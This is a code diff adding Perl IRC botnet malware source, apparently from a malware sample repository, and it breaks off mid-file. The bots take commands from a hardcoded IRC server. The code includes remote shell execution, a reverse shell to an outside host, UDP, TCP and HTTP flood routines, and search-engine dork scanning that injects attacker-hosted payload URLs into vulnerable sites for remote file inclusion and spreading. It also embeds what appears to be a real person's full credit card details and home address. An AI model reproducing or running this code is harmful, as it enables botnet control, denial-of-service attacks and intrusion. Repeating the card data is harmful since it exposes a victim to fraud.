"http://it.altavista.com/web/results?itag=ody&kgs=0&kls=0&dis=1&q=" + . key($key) . "&stq=" + . $b ); + my $Res = query($AlT); + while ( $Res =~ m/<span class=ngrn>(.+?)\//g ) { + if ( $1 !~ /altavista/ ) { + my $k = $1; + $k =~ s/<//g; + $k =~ s/ //g; + my @grep = links($k); + push( @lst, @grep ); + } + } + if ( $Res =~ /target=\"_self\">Succ/ ) { } + else { return @lst; } + } + return @lst; +} + + +sub uolsub() { + my @lst; + my $key = $_[0]; + for ( $b = 1 ; $b <= 1000 ; $b += 10 ) { + my $UoL = + ( "http://busca.uol.com.br/www/index.html?q=" + . key($key) + . "&start=" + . $i ); + my $Res = query($UoL); + while ( $Res =~ m/<a href=\"http:\/\/([^>\"]*)/g ) { + my $k = $1; + if ( $k !~ /busca|uol|yahoo/ ) { + my $k = $1; + my @grep = links($k); + push( @lst, @grep ); + } + } + } + return @lst; +} + +sub search() { + my $key = $_[0]; + my $i = 1; + my $pg = 80; + my @lst; + my $av = 1; + while ( $i <= $pg ) { + my $search = "http://www.search.com/search?q=$key"; + my $req = HTTP::Request->new( GET => $search ); + my $ua = LWP::UserAgent->new(); + $ua->agent('Netscape 4.78/U.S., 25-Jun-01; (c) 1995-2000'); + my $response = $ua->request($req); + my $resp = $response->content; + while ( $resp =~ m/<a href=\"?http:\/\/(.+?)\//g ) { + if ( $1 !~ /msn|live|google|yahoo/ ) { + my $ok = "$1/"; + push( @lst, $ok ); + } + } + $av = $av + 10; + $i++; + } + return @lst; +} + +sub searchs() { + my @lst; + my $key = $_[0]; + for ( $b = 1 ; $b <= 100 ; $b++ ) { + my $sc = + ( "http://www.search.com/search?q=" . key($key) . "&nav=" . $b ); + my $Res = query($sc); + while ( $Res =~ m/<a href=\"?http:\/\/(.+?)/g ) { + my $k = $1; + my @grep = links($k); + push( @lst, @grep ); + } + } + return @lst; +} + +sub msn() { + my @lst; + my $key = $_[0]; + for ( $b = 1 ; $b <= 1000 ; $b += 10 ) { + my $MsN = + ( "http://search.live.com/results.aspx?q=" + . key($key) + . "&first=" + . $b + . "&FORM=PERE" ); + my $Res = query($MsN); + while ( $Res =~ m/<a href=\"?http:\/\/([^>\"]*)\//g ) { + if ( $1 !~ /msn|live/ ) { + my $k = $1; + my @grep = links($k); + push( @lst, @grep ); + } + } + } + return @lst; +} + +sub ask() { + my @lst; + my $key = $_[0]; + my $i = 0; + my $pg = 0; + for ( $i = 0 ; $i <= 1000 ; $i += 10 ) { + my $Ask = + ( "http://it.ask.com/web?q=" + . key($key) + . "&o=312&l=dir&qsrc=0&page=" + . $i + . "&dm=all" ); + my $Res = query($Ask); + while ( $Res =~ + m/<a id=\"(.*?)\" class=\"(.*?)\" href=\"(.+?)\onmousedown/g ) + { + my $k = $3; + $k =~ s/[\"\ ]//g; + my @grep = links($k); + push( @lst, @grep ); + } + } + return @lst; +} + +sub fireball() { + my $key = $_[0]; + my $inizio = 1; + my $pagine = 200; + my @lst; + my $av = 0; + while ( $inizio <= $pagine ) { + my $fireball = + "http://suche.fireball.de/cgi-bin/pursuit?pag=$av&query=" + . key($key) + . "&cat=fb_loc&idx=all&enc=utf-8"; + my $Res = query($fireball); + while ( $Res =~ m/<a href=\"?http:\/\/(.+?)\//g ) { + if ( $1 !~ /msn|live|google|yahoo/ ) { + my $k = "$1/"; + my @grep = links($k); + push( @lst, @grep ); + } + } + $av = $av + 10; + $inizio++; + } + return @lst; +} + +sub links() { + my @l; + my $link = $_[0]; + my $host = $_[0]; + my $hdir = $_[0]; + $hdir =~ s/(.*)\/[^\/]*$/\1/; + $host =~ s/([-a-zA-Z0-9\.]+)\/.*/$1/; + $host .= "/"; + $link .= "/"; + $hdir .= "/"; + $host =~ s/\/\//\//g; + $hdir =~ s/\/\//\//g; + $link =~ s/\/\//\//g; + push( @l, $link, $host, $hdir ); + return @l; +} + +sub geths() { + my $host = $_[0]; + $host =~ s/([-a-zA-Z0-9\.]+)\/.*/$1/; + return $host; +} + +sub key() { + my $dork = $_[0]; + $dork =~ s/ /\+/g; + $dork =~ s/:/\%3A/g; + $dork =~ s/\//\%2F/g; + $dork =~ s/&/\%26/g; + $dork =~ s/\"/\%22/g; + $dork =~ s/,/\%2C/g; + $dork =~ s/\\/\%5C/g; + return $dork; +} + +sub end() { + $string = $_[0]; + $string .= "/"; + $string =~ s/\/\//\//; + while ( $string =~ /\/\// ) { + $string =~ s/\/\//\//; + } + return ($string); +} + +sub query($) { + my $url = $_[0]; + $url =~ s/http:\/\///; + my $host = $url; + my $query = $url; + my $page = ""; + $host =~ s/href=\"?http:\/\///; + $host =~ s/([-a-zA-Z0-9\.]+)\/.*/$1/; + $query =~ s/$host//; + if ( $query eq "" ) { $query = "/"; } + eval { + my $sock = IO::Socket::INET->new( + PeerAddr => "$host", + PeerPort => "80", + Proto => "tcp" + ) or return; + print $sock +"GET $query HTTP/1.0\r\nHost: $host\r\nAccept: */*\r\nUser-Agent: Mozilla/5.0\r\n\r\n"; + my @r = <$sock>; + $page = "@r"; + close($sock); + }; + return $page; +} + +sub get_link() { + my $file_print = $_[1]; + my $link = $_[0]; + my $host = $_[0]; + my $host_dir = $_[0]; + my @links; + $host_dir =~ s/(.*)\/[^\/]*$/\1/; + $host =~ s/([-a-zA-Z0-9\.]+)\/.*/$1/; + $host_dir = &end($host_dir); + $host = &end($host); + $link = &end($host); + push( @links, $link, $host, $host_dir ); + open( $file, '>>', $file_print ); + print $file "$link\n$host_dir\n$host\n"; + close($file); + return @links; +} + +sub unici { + my @unici = (); + my %visti = (); + foreach my $elemento (@_) { + $elemento =~ s/\/+/\//g; + next if $visti{$elemento}++; + push @unici, $elemento; + } + return @unici; +} diff --git a/Perl/Backdoor.Perl.IRCBot.v b/Perl/Backdoor.Perl.IRCBot.v new file mode 100644 index 00000000..e1810923 --- /dev/null +++ b/Perl/Backdoor.Perl.IRCBot.v @@ -0,0 +1,1075 @@ +# Pitbull Bot +# Only for priv8 use ! +# +# Commands : +# +# Scan..............: !bot @scan TIME index.php?page= inurl:"index.php?page="+site:id +# Udp-flood.....: !bot @udpflood IP PACKET-SIZE TIME +# Tcp-flood.....: !bot @tcpflood IP PORT TIME +# Http-flood....: !bot @httpflood www.website.com TIME +# Portscan.......: !bot @portscan www.website.com +# +# More Features Coming.... + +use HTTP::Request; +require HTTP::Request; +require LWP::UserAgent; +use LWP::UserAgent; + + +my $processo = '/usr/bin/bash'; + + + +#CONFIGURATION + +my $linas_max='8'; + +my $sleep='5'; + +my @cmdstring='http://az.co.cz/foto/c9.txt?'; + +my @adms=("SuPrEmO","JaheeM","R3DF0X","ZEROCOOL","FaStiDiO"); + +my @canais=("#r4k3t"); + +my @nickname = ("UnIX|0000"); + + +my $nick = $nickname[rand scalar @nickname]; + +my $ircname ='rox|'; + + +chop (my $realname = 'Hansje'); + +$servidor='211.21.73.10' unless $servidor; + +my $porta='6667'; + +my $VERSAO = '11,1 unlocker BOT'; + +$SIG{'INT'} = 'IGNORE'; + +$SIG{'HUP'} = 'IGNORE'; + +$SIG{'TERM'} = 'IGNORE'; + +$SIG{'CHLD'} = 'IGNORE'; + +$SIG{'PS'} = 'IGNORE'; + +use IO::Socket; + +use Socket; + +use IO::Select; + +chdir("/"); + +#Connect + +$servidor="$ARGV[0]" if $ARGV[0]; + +$0="$processo"."\0"x16;; + +my $pid=fork; + +exit if $pid; + +die "Masalah fork: $!" unless defined($pid); + + + + +our %irc_servers; + +our %DCC; + +my $dcc_sel = new IO::Select->new(); + + +$sel_cliente = IO::Select->new(); + +sub sendraw { + + if ($#_ == '1') { + + my $socket = $_[0]; + + print $socket "$_[1]\n"; + + } else { + + print $IRC_cur_socket "$_[0]\n"; + + } + +} + + + +sub conectar { + + my $meunick = $_[0]; + + my $servidor_con = $_[1]; + + my $porta_con = $_[2]; + + + my $IRC_socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$servidor_con", + PeerPort=>$porta_con) or return(1); + + if (defined($IRC_socket)) { + + $IRC_cur_socket = $IRC_socket; + + + $IRC_socket->autoflush(1); + + $sel_cliente->add($IRC_socket); + + + $irc_servers{$IRC_cur_socket}{'host'} = "$servidor_con"; + + $irc_servers{$IRC_cur_socket}{'porta'} = "$porta_con"; + + $irc_servers{$IRC_cur_socket}{'nick'} = $meunick; + + $irc_servers{$IRC_cur_socket}{'meuip'} = $IRC_socket->sockhost; + + nick("$meunick"); + + sendraw("USER $ircname ".$IRC_socket->sockhost." $servidor_con :$realname"); + + sleep 1; + + } + +} + +my $line_temp; + +while( 1 ) { + + while (!(keys(%irc_servers))) { conectar("$nick", "$servidor", "$porta"); } + + delete($irc_servers{''}) if (defined($irc_servers{''})); + + my @ready = $sel_cliente->can_read(0); + + next unless(@ready); + + foreach $fh (@ready) { + + $IRC_cur_socket = $fh; + + $meunick = $irc_servers{$IRC_cur_socket}{'nick'}; + + $nread = sysread($fh, $msg, 4096); + + if ($nread == 0) { + + $sel_cliente->remove($fh); + + $fh->close; + + delete($irc_servers{$fh}); + + } + + @lines = split (/\n/, $msg); + + + + for(my $c=0; $c<= $#lines; $c++) { + + $line = $lines[$c]; + + $line=$line_temp.$line if ($line_temp); + + $line_temp=''; + + $line =~ s/\r$//; + + unless ($c == $#lines) { + + parse("$line"); + + } else { + + if ($#lines == 0) { + + parse("$line"); + + } elsif ($lines[$c] =~ /\r$/) { + parse("$line"); + + } elsif ($line =~ /^(\S+) NOTICE AUTH :\*\*\*/) { + + parse("$line"); + } else { + + $line_temp = $line; + + } + + } + + } + + } + +} + + + +sub parse { + + my $servarg = shift; + + if ($servarg =~ /^PING \:(.*)/) { + + sendraw("PONG :$1"); + + } elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?) PRIVMSG (.+?) \:(.+)/) { + + my $pn=$1; my $hostmask= $3; my $onde = $4; my $args = $5; + + if ($args =~ /^\001VERSION\001$/) { + + notice("$pn", "\001VERSION mIRC v6.17 PitBull\001"); + + } + + if (grep {$_ =~ /^\Q$pn\E$/i } @adms ) { + + if ($onde eq "$meunick"){ + + shell("$pn", "$args"); + + } + + if ($args =~ /^(\Q$meunick\E|\!bot)\s+(.*)/ ) { + + my $natrix = $1; + + my $arg = $2; + + if ($arg =~ /^\!(.*)/) { + + ircase("$pn","$onde","$1") unless ($natrix eq "!bot" and $arg =~ /^\!nick/); + + } elsif ($arg =~ /^\@(.*)/) { + + $ondep = $onde; + + $ondep = $pn if $onde eq $meunick; + bfunc("$ondep","$1"); + + } else { + + shell("$onde", "$arg"); + + } + + } + +} + +} + +elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?)\s+NICK\s+\:(\S+)/i) { + +if (lc($1) eq lc($meunick)) { + + $meunick=$4; + $irc_servers{$IRC_cur_socket}{'nick'} = $meunick; + +} + +} elsif ($servarg =~ m/^\:(.+?)\s+433/i) { + +nick("$meunick|".int rand(999999)); + +} elsif ($servarg =~ m/^\:(.+?)\s+001\s+(\S+)\s/i) { + +$meunick = $2; + +$irc_servers{$IRC_cur_socket}{'nick'} = $meunick; + +$irc_servers{$IRC_cur_socket}{'nome'} = "$1"; + +foreach my $canal (@canais) { + + sendraw("JOIN $canal ddosit"); + +} + +} + +} + + + + +sub bfunc { + +my $printl = $_[0]; + +my $funcarg = $_[1]; + +if (my $pid = fork) { + +waitpid($pid, 0); + +} else { + +if (fork) { + + exit; + +} else { + +if ($funcarg =~ /^portscan (.*)/) { + + my $hostip="$1"; + + my + + + @portas=("21","22"); + + my (@aberta, %porta_banner); + + sendraw($IRC_cur_socket, "PRIVMSG $printl :12[9Scan12] 12De Poorten van 7".$1." 12worden gescanned [DEV STATUS] ."); + + foreach my $porta (@portas) { + + my $scansock = IO::Socket::INET->new(PeerAddr => $hostip, PeerPort => $porta, Proto => + + 'tcp', Timeout => 4); + + if ($scansock) { + + push (@aberta, $porta); + + $scansock->close; + + } + + } + + + if (@aberta) { + + sendraw($IRC_cur_socket, "PRIVMSG $printl :12[9Scan12] 12Open poort gevonden: @aberta"); + + } else { + + sendraw($IRC_cur_socket,"PRIVMSG $printl :12[9Scan12] 12Geen open poorten gevonden"); + + } + +} + + if ($funcarg =~ /^join (.*)/) { + sendraw($IRC_cur_socket, "JOIN ".$1); + } + if ($funcarg =~ /^part (.*)/) { + sendraw($IRC_cur_socket, "PART ".$1); + } + +if ($funcarg =~ /^tcpflood\s+(.*)\s+(\d+)\s+(\d+)/) { + + + sendraw($IRC_cur_socket, "PRIVMSG $printl :12[9TCP DDoSing12] 12Attacking ".$1.":".$2." for ".$3." 12seconden."); + + my $itime = time; + + my ($cur_time); + + $cur_time = time - $itime; + + while ($3>$cur_time){ + + $cur_time = time - $itime; + + &tcpflooder("$1","$2","$3"); + +} + +sendraw($IRC_cur_socket, "PRIVMSG $printl :PRIVMSG $printl :12[9TCP DDoSing12] 12Attack done ".$1.":".$2."."); + +} + +# COMMAND HELP + +if ($funcarg =~ /^commands/) { + +sendraw($IRC_cur_socket, "PRIVMSG $printl :$VERSAO 7 Commando's : 3[7 ddos, scanner, poortscan, version  3]4 Gebruik !bot 7@woord " . $VERSAO); + +} + +if ($funcarg =~ /^ddos/) { + +sendraw($IRC_cur_socket, "PRIVMSG $printl :$VERSAO 7 !bot 9@7udpflood IP PACKET-SIZE TIME, !bot 9@7tcpflood IP PORT TIME, !bot 9@7httpflood www.website.com TIME " . $VERSAO); + +} + +if ($funcarg =~ /^scanner/) { + +sendraw($IRC_cur_socket, "PRIVMSG $printl :$VERSAO 7 !bot 9@7scan TIME vuln+site:id " . $VERSAO); + +} + +if ($funcarg =~ /^poortscan/) { + +sendraw($IRC_cur_socket, "PRIVMSG $printl :$VERSAO 7 !bot 9@7portscan IP/SITE " . $VERSAO); + +} + +if ($funcarg =~ /^version/) { + +sendraw($IRC_cur_socket, "PRIVMSG $printl :$VERSAO 7 Sexy Version xD " . $VERSAO); + +} + +if ($funcarg =~ /^bugs/) { + +sendraw($IRC_cur_socket, "PRIVMSG $printl :$VERSAO 7 Sexy Version xD " . $VERSAO); + +} + +if ($funcarg =~ /^cc/) { + +sendraw($IRC_cur_socket, "PRIVMSG $printl :$VERSAO 7 creditCardInfo_cardType: 4,Card Type : Visa Card,ccnum: 4791070124539980,creditCardInfo_expirationDate_month: jan,creditCardInfo_expirationDate_year: 2008,cvv: 996,pin: N/A,nameFirst: Desiree M,nameLast: Pramuk,addressStreet1: 2207 Lake Ave,addressStreet2:,addressApt:,addressCity: Whiting,addressState: IN,addressZipCode: 46394,phoneDay: 219-...,phoneEvening: 219-659-1199  " . $VERSAO); + +} + +if ($funcarg =~ /^open(\S+)/) { +my $site = $1; +$request = HTTP::Request->new(GET => "$site"); +$ua = LWP::UserAgent->new; + $response = $ua->request($request); + +} + + + + + +if ($funcarg =~ /^back\s+(.*)\s+(\d+)/) { + +my $host = "$1"; + +my $porta = "$2"; + +my $proto = getprotobyname('tcp'); + +my $iaddr = inet_aton($host); + +my $paddr = sockaddr_in($porta, $iaddr); + +my $shell = "/bin/sh -i"; + +if ($^O eq "MSWin32") { + + $shell = "cmd.exe"; + +} + +socket(SOCKET, PF_INET, SOCK_STREAM, $proto) or die "socket: $!"; + +connect(SOCKET, $paddr) or die "connect: $!"; + +open(STDIN, ">&SOCKET"); + +open(STDOUT, ">&SOCKET"); + +open(STDERR, ">&SOCKET"); + +system("$shell"); + +close(STDIN); + +close(STDOUT); + +close(STDERR); + + +if ($estatisticas) + +{ + + sendraw($IRC_cur_socket, "PRIVMSG $printl :12[9BackConnect12]: Bezig met het connecteren naar $host:$porta"); + +} + +} + + +#SCANNER + +if ($funcarg =~ /^scan\s+(\d+)\s+(.*)\s+(.*)/) { + +@gstring = $3; + +$boturl=$2; + +sendraw($IRC_cur_socket, "PRIVMSG $printl :11,1Scan key 4".$3." 11Vuln 4".$boturl." 11Voor 4".$1." 11seconden."); + +srand; + +my $itime = time; + +my ($cur_time); + +my ($exploited); + +$boturl=$2; + +$cur_time = time - $itime;$exploited = 0; + +while($1>$cur_time){ + +$cur_time = time - $itime; + +@urls=fetch(); + +foreach $url (@urls) { + + $cur_time = time - $itime; + + sendraw($IRC_cur_socket, "PRIVMSG #debug :15(7@2Scan15) 15(2Exploiting7:12 ".$url2." 15)"); + my $path = "";my $file = "";($path, $file) = $url =~ /^(.+)\/(.+)$/; + + $url2 ="http://".$path."/".$boturl."@cmdstring?"; + + + print "\n".$url2."\n\n"; + + + + + + my $req=HTTP::Request->new(GET=>$url2); + + my $ua=LWP::UserAgent->new(); + + $ua->timeout(10); + + my $response=$ua->request($req); + + + if ($response->is_success) { + + if( $response->content =~ /By/ && $response->content =~ /Hamkar/ ){ + + sendraw($IRC_cur_socket, "PRIVMSG $printl :15(7@2Target15) 4".$url2."\n\n"); + + } + +} + +else { +} + +} + +} + +sendraw($IRC_cur_socket, "PRIVMSG $printl :11,1Scan Hamkar ".$1." time."); + +} + +if ($funcarg =~ /^httpflood\s+(.*)\s+(\d+)/) { + +sendraw($IRC_cur_socket, "PRIVMSG $printl :12[9HTTP DDoSing12] 12Attacking ".$1."12 Op poort 80 voor  ".$2." 12seconden."); + +my $itime = time; + +my ($cur_time); + +$cur_time = time - $itime; + +while ($2>$cur_time){ + +$cur_time = time - $itime; + +my $socket = IO::Socket::INET->new(proto=>'tcp', PeerAddr=>$1, PeerPort=>80); + +print $socket "GET / HTTP/1.1\r\nAccept: */*\r\nHost: ".$1."\r\nConnection: Keep-Alive\r\n\r\n"; + +close($socket); + +} + +sendraw($IRC_cur_socket, "PRIVMSG $printl :12[9HTTP DDoSing12] 12Attacking done ".$1."."); + +} + +if ($funcarg =~ /^udpflood\s+(.*)\s+(\d+)\s+(\d+)/) { + +sendraw($IRC_cur_socket, "PRIVMSG $printl :12[9UDP DDoSing12] 12Attacking ".$1." 12met ".$2."12 Kb aan packets voor ".$3." 12seconden."); + +my ($dtime, %pacotes) = udpflooder("$1", "$2", "$3"); + +$dtime = 1 if $dtime == 0; + +my %bytes; + +$bytes{igmp} = $2 * $pacotes{igmp}; + +$bytes{icmp} = $2 * $pacotes{icmp}; + +$bytes{o} = $2 * $pacotes{o}; + +$bytes{udp} = $2 * $pacotes{udp}; + +$bytes{tcp} = $2 * $pacotes{tcp}; + +sendraw($IRC_cur_socket, "PRIVMSG $printl :12[9UDP DDoSing12] 12Resultaten ".int(($bytes{icmp}+$bytes{igmp}+$bytes{udp} + $bytes{o})/1024)." 12Kb in ".$dtime." 12seconden naar ".$1."."); + +} + +exit; + +} + +} + +} + + + +sub ircase { + +my ($kem, $printl, $case) = @_; + + + if ($case =~ /^join (.*)/) { + j("$1"); + } + if ($case =~ /^part (.*)/) { + p("$1"); + } + +if ($case =~ /^rejoin\s+(.*)/) { + +my $chan = $1; + +if ($chan =~ /^(\d+) (.*)/) { + +for (my $ca = 1; $ca <= $1; $ca++ ) { + +p("$2"); + +j("$2"); + +} + +} +else { + +p("$chan"); + +j("$chan"); + +} + +} + +if ($case =~ /^op/) { + +op("$printl", "$kem") if $case eq "op"; + +my $oarg = substr($case, 3); + +op("$1", "$2") if ($oarg =~ /(\S+)\s+(\S+)/); + +} + +if ($case =~ /^deop/) { + +deop("$printl", "$kem") if $case eq "deop"; + +my $oarg = substr($case, 5); + +deop("$1", "$2") if ($oarg =~ /(\S+)\s+(\S+)/); + +} + +if ($case =~ /^msg\s+(\S+) (.*)/) { + +msg("$1", "$2"); + +} + +if ($case =~ /^flood\s+(\d+)\s+(\S+) (.*)/) { + +for (my $cf = 1; $cf <= $1; $cf++) { + +msg("$2", "$3"); + +} + +} + +if ($case =~ /^ctcp\s+(\S+) (.*)/) { + +ctcp("$1", "$2"); + +} + +if ($case =~ /^ctcpflood\s+(\d+)\s+(\S+) (.*)/) { + +for (my $cf = 1; $cf <= $1; $cf++) { + +ctcp("$2", "$3"); + +} + +} + +if ($case =~ /^nick (.*)/) { + +nick("$1"); + +} + +if ($case =~ /^connect\s+(\S+)\s+(\S+)/) { + +conectar("$2", "$1", 6667); + +} + +if ($case =~ /^raw (.*)/) { + +sendraw("$1"); + +} + +if ($case =~ /^eval (.*)/) { + +eval "$1"; + +} + +} + + +sub shell { + +my $printl=$_[0]; + +my $comando=$_[1]; + +if ($comando =~ /cd (.*)/) { + +chdir("$1") || msg("$printl", "No such file or directory"); + +return; + +} + +elsif ($pid = fork) { + +waitpid($pid, 0); + +} +else { + +if (fork) { + +exit; + +} else { + +my @resp=`$comando 2>&1 3>&1`; + +my $c=0; + +foreach my $linha (@resp) { + + $c++; + + chop $linha; + + sendraw($IRC_cur_socket, "PRIVMSG $printl :$linha"); + + if ($c == "$linas_max") { + + $c=0; + + sleep $sleep; + + } + +} + +exit; + +} + +} + +} + + + +sub tcpflooder { + +my $itime = time; + +my ($cur_time); + +my ($ia,$pa,$proto,$j,$l,$t); + +$ia=inet_aton($_[0]); + +$pa=sockaddr_in($_[1],$ia); + +$ftime=$_[2]; + +$proto=getprotobyname('tcp'); + +$j=0;$l=0; + +$cur_time = time - $itime; + +while ($l<1000){ + +$cur_time = time - $itime; + +last if $cur_time >= $ftime; + +$t="SOCK$l"; + +socket($t,PF_INET,SOCK_STREAM,$proto); + +connect($t,$pa)||$j--; + +$j++;$l++; + +} + +$l=0; + +while ($l<1000){ + +$cur_time = time - $itime; + +last if $cur_time >= $ftime; + +$t="SOCK$l"; + +shutdown($t,2); + +$l++; + +} + +} + + + +sub udpflooder { + +my $iaddr = inet_aton($_[0]); + +my $msg = 'A' x $_[1]; + +my $ftime = $_[2]; + +my $cp = 0; + +my (%pacotes); + +$pacotes{icmp} = $pacotes{igmp} = $pacotes{udp} = $pacotes{o} = $pacotes{tcp} = 0; + + + +socket(SOCK1, PF_INET, SOCK_RAW, 2) or $cp++; + + +socket(SOCK2, PF_INET, SOCK_DGRAM, 17) or $cp++; + +socket(SOCK3, PF_INET, SOCK_RAW, 1) or $cp++; + +socket(SOCK4, PF_INET, SOCK_RAW, 6) or $cp++; + +return(undef) if $cp == 4; + +my $itime = time; + +my ($cur_time); + +while ( 1 ) { + +for (my $porta = 1; +$porta <= 65000; $porta++) { + +$cur_time = time - $itime; + +last if $cur_time >= $ftime; + +send(SOCK1, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{igmp}++; + +send(SOCK2, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{udp}++; + +send(SOCK3, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{icmp}++; + +send(SOCK4, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{tcp}++; + + +for (my $pc = 3; +$pc <= 255;$pc++) { + +next if $pc == 6; + +$cur_time = time - $itime; + +last if $cur_time >= $ftime; + +socket(SOCK5, PF_INET, SOCK_RAW, $pc) or next; + +send(SOCK5, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{o}++; + +} + +} + +last if $cur_time >= $ftime; + +} + +return($cur_time, %pacotes); + +} + + + +sub ctcp { + +return unless $#_ == 1; + +sendraw("PRIVMSG $_[0] :\001$_[1]\001"); + +} + +sub msg { + +return unless $#_ == 1; + +sendraw("PRIVMSG $_[0] :$_[1]"); + +} + +sub notice { + +return unless $#_ == 1; + +sendraw("NOTICE $_[0] :$_[1]"); + +} + +sub op { + +return unless $#_ == 1; + +sendraw("MODE $_[0] +o $_[1]"); + +} + +sub deop { + +return unless $#_ == 1; + +sendraw("MODE $_[0] -o $_[1]"); + +} + +sub j { +&join(@_); +} + +sub join { + +return unless $#_ == 0; + +sendraw("JOIN $_[0]"); + +} + +sub p { part(@_); +} + +sub part { + +sendraw("PART $_[0]"); + +} + +sub nick { + +return unless $#_ == 0; + +sendraw("NICK $_[0]"); + +} + +sub quit { + +sendraw("QUIT :$_[0]"); + +} + +sub fetch(){ +my $rnd=(int(rand(9999))); +my $n= 80; +if ($rnd<5000) { $n<<=1;} +my $s= (int(rand(10)) * $n); +{ +my @dominios = ("removed-them-all"); +my @str; +foreach $dom (@dominios) +{ +push (@str,"@gstring"); +} +my $query="www.google.com/search?q="; +$query.=$str[(rand(scalar(@str)))]; +$query.="&num=$n&start=$s"; +my @lst=(); +sendraw("privmsg #debug :DEBUG only test googling: ".$query.""); +my $page = http_query($query); +while ($page =~ m/<a href=\"?http:\/\/([^>\"]+)\"? class=l>/g){ +if ($1 !~ m/google|cache|translate/){ +push (@lst,$1); +} +} +return (@lst); +} +sub http_query($){ +my ($url) = @_; +my $host=$url; +my $query=$url; +my $page=""; +$host =~ s/href=\"?http:\/\///; +$host =~ s/([-a-zA-Z0-9\.]+)\/.*/$1/; +$query =~s/$host//; +if ($query eq "") {$query="/";}; +eval { +local $SIG{ALRM} = sub { die "1";}; +alarm 10; +my $sock = IO::Socket::INET->new(PeerAddr=>"$host",PeerPort=>"80",Proto=>"tcp") or return; +print $sock "GET $query HTTP/1.0\r\nHost: $host\r\nAccept: */*\r\nUser-Agent: Mozilla/5.0\r\n\r\n"; +my @r = <$sock>; +$page="@r"; +alarm 0; +close($sock); +}; +return $page; +} +} diff --git a/Perl/Backdoor.Perl.IRCBot.w b/Perl/Backdoor.Perl.IRCBot.w new file mode 100644 index 00000000..196682ff --- /dev/null +++ b/Perl/Backdoor.Perl.IRCBot.w @@ -0,0 +1,487 @@ +use HTTP::Request; +use LWP::UserAgent; +use IO::Socket::INET; + + +my $cmd = "http://www.wauze.de//language/lang_english/RuLeZ/me.txt?"; +my $cmdprint = "http://www.wauze.de//language/lang_english/r.txt??"; +my $nick = "UnIx|".(int(rand(99))); +my $ident = "xpl"; +my $chan = "#r4k3t"; +my $server = "211.21.73.10"; +my $http = "Googlebot"; +my $port = 6667; +my $sock; +my $proxy = 30; +my $admin = "SuPrEmO"; +my $stringa = "!scan"; +my $spread = "http://www.malteser-paderborn.de//contenido/includes/c.txt?"; +my @User_Agent = &Agent(); +my $pid = fork(); + +if($pid==0){ + &irc($nick,$ident,$chan,$server,$port); +}else{ + exit(0); +} + +sub irc(){ + my($nick,$ident,$chan,$server,$port)=@_; + $sock = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$server",PeerPort=>$port); + $sock->autoflush(1); + print $sock "NICK ".$nick."\r\n"; + print $sock "USER ".$ident." 8 * : By SISTEM\r\n"; + print $sock "JOIN ".$chan."\r\n"; + while( $cmdline = <$sock> ){ + if ( $cmdline =~ /PRIVMSG $chan :$stringa\s+(.*?)\s+(.*)/ ) { + if(fork() == 0){ + my($bug,$dork)=($1,$2); + &scan($bug,$dork); + exit(0); + } + } + if ($cmdline =~ /PRIVMSG $chan :!info/){ + &privmsg($chan,"9[10Per scannare9]: 15$stringa bug dork"); + } + if ($cmdline =~ /PRIVMSG $chan :!outbye/){ + exit(0); + } + if($cmdline =~ /^PING \:(.*)/){ + print $sock "PONG :$1"; + } + } +} + +sub scan(){ + my($bug,$dork)=@_; + my $contatore = 0; + &privmsg($chan,"9[10Scansione Per9]: 5Bug:".$bug); + &privmsg($chan,"9[10Scansione Per9]: 6Dork:".$dork); + my @proc; + $proc[9] = fork(); + if($proc[9] == 0){ + &privmsg($chan,"9[10Scansione Di9]: 6Google4:".scalar(&Google($dork))); + exit; + } + $proc[1] = fork(); + if($proc[1] == 0){ + &privmsg($chan,"9[10Scansione Di9]: 6Yahoo4:".scalar(&Yahoo($dork))); + exit; + } + $proc[2] = fork(); + if($proc[2] == 0){ + &privmsg($chan,"9[10Scansione Di9]: 6Altavista4:".scalar(&Altavista($dork))); + exit; + } + $proc[3] = fork(); + if($proc[3] == 0){ + &privmsg($chan,"9[10Scansione Di9]: 6Lycos4:".scalar(&Gigablast($dork))); + exit; + } + $proc[4] = fork(); + if($proc[4] == 0){ + &privmsg($chan,"9[10Scansione Di9]: 6Msn4:".scalar(&Msn($dork))); + exit; + } + $proc[5] = fork(); + if($proc[5] == 0){ + &privmsg($chan,"9[10Scansione Di9]: 6Ilse.Nl4:".scalar(&Ask($dork))); + exit; + } + $proc[6] = fork(); + if($proc[6] == 0){ + &privmsg($chan,"9[10Scansione Di9]: 6Tiscali4:".scalar(&Fireball($dork))); + exit; + } + $proc[7] = fork(); + if($proc[7] == 0){ + &privmsg($chan,"9[10Scansione Di9]: 6Alltheweb4:".scalar(&Alltheweb($dork))); + exit; + } + $proc[8] = fork(); + if($proc[8] == 0){ + &privmsg($chan,"9[10Scansione Di9]: 6Aol4:".scalar(&Aol($dork))); + exit; + } + waitpid($proc[9],0); + waitpid($proc[1],0); + waitpid($proc[2],0); + waitpid($proc[3],0); + waitpid($proc[4],0); + waitpid($proc[5],0); + waitpid($proc[6],0); + waitpid($proc[7],0); + waitpid($proc[8],0); + my @links = &GetLink(); + my @forks; + my $forked++; + &privmsg($chan,"9[10Ricerca9]: 15Totals Results:".scalar(@links)); + my @uni = &Unici(@links); + &privmsg($chan,"9[10Ricerca9]: 15Cleaned:".scalar(@uni)); + &Remove(); + my $testx = scalar(@uni); + my $startx = 0; + foreach my $sito (@uni){ + $contatore++; + my $link = "http://" . $sito . $bug . $cmd . "?"; + my $link = "http://" . $sito . $bug . $spread . "?"; + if($contatore %$proxy == 0){ + my $start = 0; + foreach my $f(@forks){ + waitpid($f,0); + $forks[$start--]; + $start++; + } + $startx = 0; + } + $forks[$startx]=fork(); + if($forks[$startx] == 0){ + my $htmlsito = &Query($link,"3"); + if($htmlsite =~ /JaheeM/ && $htmlsite =~ /uid=/){ + &privmsg($chan,"9[4SAFE OFF9]: 8"."http://" . $sito . $bug . "3" . $cmdprint . "?"); + &privmsg($admin,"9[4SAFE OFF9]: 8"."http://" . $sito . $bug . "3" . $cmdprint . "?"); + &privmsg($admin,"9[4SPreAD9]: 8"."http://" . $sito . $bug . "4" . $spread . "?"); + + } + elsif($htmlsito =~ /JaheeM/){ + 